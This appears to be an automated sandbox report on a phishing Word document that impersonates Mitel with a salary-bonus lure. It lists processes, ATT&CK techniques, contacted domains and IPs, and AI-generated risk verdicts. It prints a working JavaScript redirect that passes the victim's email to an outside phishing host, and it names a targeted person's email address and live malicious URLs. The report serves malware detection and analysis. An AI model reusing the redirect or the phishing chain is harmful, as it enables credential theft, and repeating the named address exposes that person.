Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process information queried: ProcessInformation

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	2 Browser Extensions	1 Process Injection	21 Masquerading	OS Credential Dumping	1 Process Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	1 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_689616758\Google.Widevine.CDM.dll	0%	ReversingLabs

Name	IP	Active	Malicious	Reputation
www.google.com	172.217.18.100	true	false	high
app.supercast.com	54.71.143.107	true	true	unknown
icogacc.com	162.241.253.231	true	false	high
rubytech.xyz	139.99.9.144	true	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://wieistmeineip.de	sets.json.7.dr	false	high
https://mercadoshops.com.co	sets.json.7.dr	false	high
https://gliadomain.com	sets.json.7.dr	false	high
https://poalim.xyz	sets.json.7.dr	false	high
https://mercadolivre.com	sets.json.7.dr	false	high
https://easylist.to/)	LICENSE.txt.7.dr	false	high
https://reshim.org	sets.json.7.dr	false	high
https://nourishingpursuits.com	sets.json.7.dr	false	high
https://medonet.pl	sets.json.7.dr	false	high
https://unotv.com	sets.json.7.dr	false	high
https://mercadoshops.com.br	sets.json.7.dr	false	high
https://joyreactor.cc	sets.json.7.dr	false	high
https://zdrowietvn.pl	sets.json.7.dr	false	high
https://johndeere.com	sets.json.7.dr	false	high
https://songstats.com	sets.json.7.dr	false	high
https://baomoi.com	sets.json.7.dr	false	high
https://supereva.it	sets.json.7.dr	false	high
https://elfinancierocr.com	sets.json.7.dr	false	high
https://bolasport.com	sets.json.7.dr	false	high
https://rws1nvtvt.com	sets.json.7.dr	false	high
https://desimartini.com	sets.json.7.dr	false	high
https://hearty.app	sets.json.7.dr	false	high
https://hearty.gift	sets.json.7.dr	false	high
https://mercadoshops.com	sets.json.7.dr	false	high
https://heartymail.com	sets.json.7.dr	false	high
https://nlc.hu	sets.json.7.dr	false	high
https://p106.net	sets.json.7.dr	false	high
https://radio2.be	sets.json.7.dr	false	high
https://finn.no	sets.json.7.dr	false	high
https://hc1.com	sets.json.7.dr	false	high
https://kompas.tv	sets.json.7.dr	false	high
https://mystudentdashboard.com	sets.json.7.dr	false	high
https://songshare.com	sets.json.7.dr	false	high
https://smaker.pl	sets.json.7.dr	false	high
https://mercadopago.com.mx	sets.json.7.dr	false	high
https://p24.hu	sets.json.7.dr	false	high
https://talkdeskqaid.com	sets.json.7.dr	false	high
https://24.hu	sets.json.7.dr	false	high
https://mercadopago.com.pe	sets.json.7.dr	false	high
https://cardsayings.net	sets.json.7.dr	false	high
https://text.com	sets.json.7.dr	false	high
https://mightytext.net	sets.json.7.dr	false	high
https://pudelek.pl	sets.json.7.dr	false	high
https://hazipatika.com	sets.json.7.dr	false	high
https://joyreactor.com	sets.json.7.dr	false	high
https://cookreactor.com	sets.json.7.dr	false	high
https://wildixin.com	sets.json.7.dr	false	high
https://eworkbookcloud.com	sets.json.7.dr	false	high
https://cognitiveai.ru	sets.json.7.dr	false	high
https://nacion.com	sets.json.7.dr	false	high
https://chennien.com	sets.json.7.dr	false	high
https://drimer.travel	sets.json.7.dr	false	high
https://deccoria.pl	sets.json.7.dr	false	high
https://mercadopago.cl	sets.json.7.dr	false	high
https://talkdeskstgid.com	sets.json.7.dr	false	high
https://naukri.com	sets.json.7.dr	false	high
https://interia.pl	sets.json.7.dr	false	high
https://bonvivir.com	sets.json.7.dr	false	high
https://carcostadvisor.be	sets.json.7.dr	false	high
https://salemovetravel.com	sets.json.7.dr	false	high
https://sapo.io	sets.json.7.dr	false	high
https://wpext.pl	sets.json.7.dr	false	high
https://welt.de	sets.json.7.dr	false	high
https://poalim.site	sets.json.7.dr	false	high
https://drimer.io	sets.json.7.dr	false	high
https://infoedgeindia.com	sets.json.7.dr	false	high
https://blackrockadvisorelite.it	sets.json.7.dr	false	high
https://cognitive-ai.ru	sets.json.7.dr	false	high
https://cafemedia.com	sets.json.7.dr	false	high
https://graziadaily.co.uk	sets.json.7.dr	false	high
https://thirdspace.org.au	sets.json.7.dr	false	high
https://mercadoshops.com.ar	sets.json.7.dr	false	high
https://smpn106jkt.sch.id	sets.json.7.dr	false	high
https://elpais.uy	sets.json.7.dr	false	high
https://landyrev.com	sets.json.7.dr	false	high
https://the42.ie	sets.json.7.dr	false	high
https://commentcamarche.com	sets.json.7.dr	false	high
https://tucarro.com.ve	sets.json.7.dr	false	high
https://rws3nvtvt.com	sets.json.7.dr	false	high
https://eleconomista.net	sets.json.7.dr	false	high
https://helpdesk.com	sets.json.7.dr	false	high
https://mercadolivre.com.br	sets.json.7.dr	false	high
https://clmbtech.com	sets.json.7.dr	false	high
https://standardsandpraiserepurpose.com	sets.json.7.dr	false	high
https://07c225f3.online	sets.json.7.dr	false	high
https://salemovefinancial.com	sets.json.7.dr	false	high
https://mercadopago.com.br	sets.json.7.dr	false	high
https://zoom.us	sets.json.7.dr	false	high
https://commentcamarche.net	sets.json.7.dr	false	high
https://etfacademy.it	sets.json.7.dr	false	high
https://mighty-app.appspot.com	sets.json.7.dr	false	high
https://hj.rs	sets.json.7.dr	false	high
https://hearty.me	sets.json.7.dr	false	high
https://mercadolibre.com.gt	sets.json.7.dr	false	high
https://timesinternet.in	sets.json.7.dr	false	high
https://indiatodayne.in	sets.json.7.dr	false	high
https://idbs-staging.com	sets.json.7.dr	false	high
https://blackrock.com	sets.json.7.dr	false	high
https://idbs-eworkbook.com	sets.json.7.dr	false	high
https://motherandbaby.com	sets.json.7.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
54.71.143.107	app.supercast.com	United States	16509	AMAZON-02US	true
162.241.253.231	icogacc.com	United States	46606	UNIFIEDLAYER-AS-1US	false
139.99.9.144	rubytech.xyz	Canada	16276	OVHFR	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.217.18.100	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4
192.168.2.6
192.168.2.5

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1591422
Start date and time:	2025-01-15 00:28:57 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	mitel.docx
Detection:	MAL
Classification:	mal56.phis.troj.winDOCX@23/26@10/8
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .docx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 2.23.242.162, 216.58.212.174, 108.177.15.84, 142.250.185.163, 2.17.190.73, 142.250.185.238, 84.201.210.39, 52.111.243.40, 52.111.243.41, 52.111.243.42, 52.111.243.43, 20.44.10.123, 2.20.245.225, 2.20.245.216, 52.109.28.47, 142.250.181.238, 142.250.184.206, 142.250.186.46, 199.232.214.172, 142.250.186.110, 142.250.186.174, 216.58.212.131, 216.58.206.78, 142.250.185.206, 34.104.35.123, 199.232.210.172, 216.58.206.46, 142.250.185.110, 142.250.186.78, 172.217.18.14, 13.107.246.45, 40.126.32.74, 4.245.163.56
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, onedscolprdcus05.centralus.cloudapp.azure.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, login.live.com, e16604.g.akamaiedge.net, update.googleapis.com, officeclient.microsoft.com, templatesmetadata.office.net, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, clients1.google.com, ecs.office.com, self-events-data.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, fe3
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Source	URL
Screenshot	https://app.supercast.com/ahoy/messages/IyOwn1xl2n6XdxToR2XV5dCRxhEvflsH/click?signature=96e743b76714148502315415a04739f234047e43&url=https://rubytech.xyz/0secure/index.html#ludmila.glinberg+mitel.com
Screenshot	https://app.supercast.com/ahoy/messages/IyOwn1xl2n6XdxToR2XV5dCRxhEvflsH/click?signature=96e743b76714148502315415a04739f234047e43&url=https://rubytech.xyz/0secure/index.html#ludmila.glinberg+mitel.com
Screenshot	https://app.supercast.com/ahoy/messages/IyOwn1xl2n6XdxToR2XV5dCRxhEvflsH/click?signature=96e743b76714148502315415a04739f234047e43&url=https://rubytech.xyz/0secure/index.html#ludmila.glinberg+mitel.com

LLM Input / Output

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown
URL: https://rubytech.xyz/0secure/index.html#ludmila.gl... Model: Joe Sandbox AI	{ "risk_score": 8, "reasoning": "This script exhibits several high-risk behaviors, including redirecting the user to a suspicious domain (icogacc.com) and extracting and transmitting potentially sensitive data (email address) from the URL fragment. The use of obfuscation techniques (replacing '+' with '@') further increases the risk. Overall, this script demonstrates a high likelihood of malicious intent and should be treated with caution." }
(function() { // Retrieve the fragment part of the URL without the leading '#' let hashValue = window.location.hash.slice(1); // Replace all '+' characters with '@' hashValue = hashValue.replace(/\+/g, '@'); // Construct the new URL and redirect const targetUrl = 'https://icogacc.com/SITE-ID-kwtg6t7218698782/zerobot?email=' + hashValue; window.location.href = targetUrl; })();
URL: Office document Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Mitel - Updated Bonus and Salary Distribution", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": true, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://icogacc.com/SITE-ID-kwtg6t7218698782/zerobot/?email=ludmila.glinberg@mitel.com Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://icogacc.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://icogacc.com
URL: https://icogacc.com/SITE-ID-kwtg6t7218698782/zerobot/?email=ludmila.glinberg@mitel.com Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Office document Model: Joe Sandbox AI	{ "brands": [ "Mitel" ] }
	{ "brands": [ "Mitel" ] }
URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Mitel - Updated Bonus and Salary Distribution", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": true, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Mitel - Updated Bonus and Salary Distribution", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": true, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "brands": [ "Mitel" ] }
	{ "brands": [ "Mitel" ] }
URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "brands": [ "Mitel" ] }
	{ "brands": [ "Mitel" ] }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
139.99.9.144	https://ib3g8.durrotuaswaja.net/4end66	Get hash	malicious	Unknown	Browse
139.99.9.144	https://www.hamiltonchamber.ca/?ads_click=1&data=33754-33753-33752-16744-1&nonce=013f285da4&redir=https://e4nhh.durrotuaswaja.net/lb7onw	Get hash	malicious	Unknown	Browse
239.255.255.250	https://hm.ru/XKEkPr	Get hash	malicious	Unknown	Browse
	http://optimize-system-upgrades.vercel.app/	Get hash	malicious	HTMLPhisher	Browse
	http://ankur-1994.github.io/netflix_clone	Get hash	malicious	HTMLPhisher	Browse
	https://hrteil-telegram.org/login/index.html	Get hash	malicious	Unknown	Browse
	https://www.giselabravo.com/lblogin/logins	Get hash	malicious	Unknown	Browse
	https://ewptdxjkhmu.info/	Get hash	malicious	Unknown	Browse
	http://sites.google.com/view/delta-1/home/	Get hash	malicious	Unknown	Browse
	https://telegrimc.cn/	Get hash	malicious	Unknown	Browse
	https://telemgram-rg.org/	Get hash	malicious	Unknown	Browse
	http://teleqvom.cn/	Get hash	malicious	Unknown	Browse
162.241.253.231	gZU26RjMUU.exe	Get hash	malicious	FormBook	Browse	www.tubesing.com/ocgr/?8p=qVwdVxLX0&1bEX=9V0bXTkkxKWxDgp6RJOks70x/YcJP31kraxWgvuUzaENE/wb1OUHkodtz4WPL0DBPwKx
	jwRbEDUUZC.exe	Get hash	malicious	FormBook	Browse	www.tubesing.com/ocgr/?5jm=9V0bXTkkxKWxDgp6RJOks70x/YcJP31kraxWgvuUzaENE/wb1OUHkodtz4aPYkPCWgKnca4quw==&q48d=SN6PFzMPJRoDS
	Document de bancobpi_66473474.exe	Get hash	malicious	FormBook	Browse	www.paulstilingroup.com/arh2/?5j1TIdG=sfi/U9uziz3yd+cIlnupVfxmGYoGEUQ+cvnH9JBY/zXkxzDvMNHWuq6jibpyEsrEd8HV&ozr=4hLlIp3xzfzHD
	PO5594.xlsx	Get hash	malicious	FormBook	Browse	www.sarahannsartstudio.com/ddzw/?h2Mdq=iXrnxWa2MIQCLF3pcDg6+qoW1dWPNK8gD+C0AcHvSyjXkMlp/HpcZgrhMm+aOjdhifJKjg==&_x=gVp0dvG0DtZT6do0

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
app.supercast.com	https://app.supercast.com/ahoy/messages/NuCwMXL7H9TYxRcbnPV2HNBC27R3XTJ7/click?signature=a81c8ff09c7aec0f320b61cbf7dd42e1a041100b&url=https://nursematte.com/asdbhewjcjfnjernfreddbecje/cloudflare-antibot#Kirsten.stevens+sueryder.org	Get hash	malicious	HTMLPhisher	Browse	44.237.212.8
icogacc.com	Sampension-file-846845087.pdf	Get hash	malicious	Captcha Phish	Browse	162.241.253.231
	Csc-File-260593301.pdf	Get hash	malicious	Unknown	Browse	162.241.253.231
	http://cgi-wsc.alfahosting.de/extras/public/photos.cls/selection/addAll?cc=0.653810755815357&accountId=AAHS10INX3Z1&filter=&redirectUrl=https://panimex.cl/158983/secure-redirect#jacquie.treagus+csc.gov.au	Get hash	malicious	Unknown	Browse	162.241.253.231

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UNIFIEDLAYER-AS-1US	https://bafkreibsbjyfimxhx74m5tcypjri7hfpts4m6rwijhar7bcrbkwhh2xgbe.ipfs.flk-ipfs.xyz/	Get hash	malicious	HTMLPhisher	Browse	108.167.142.88
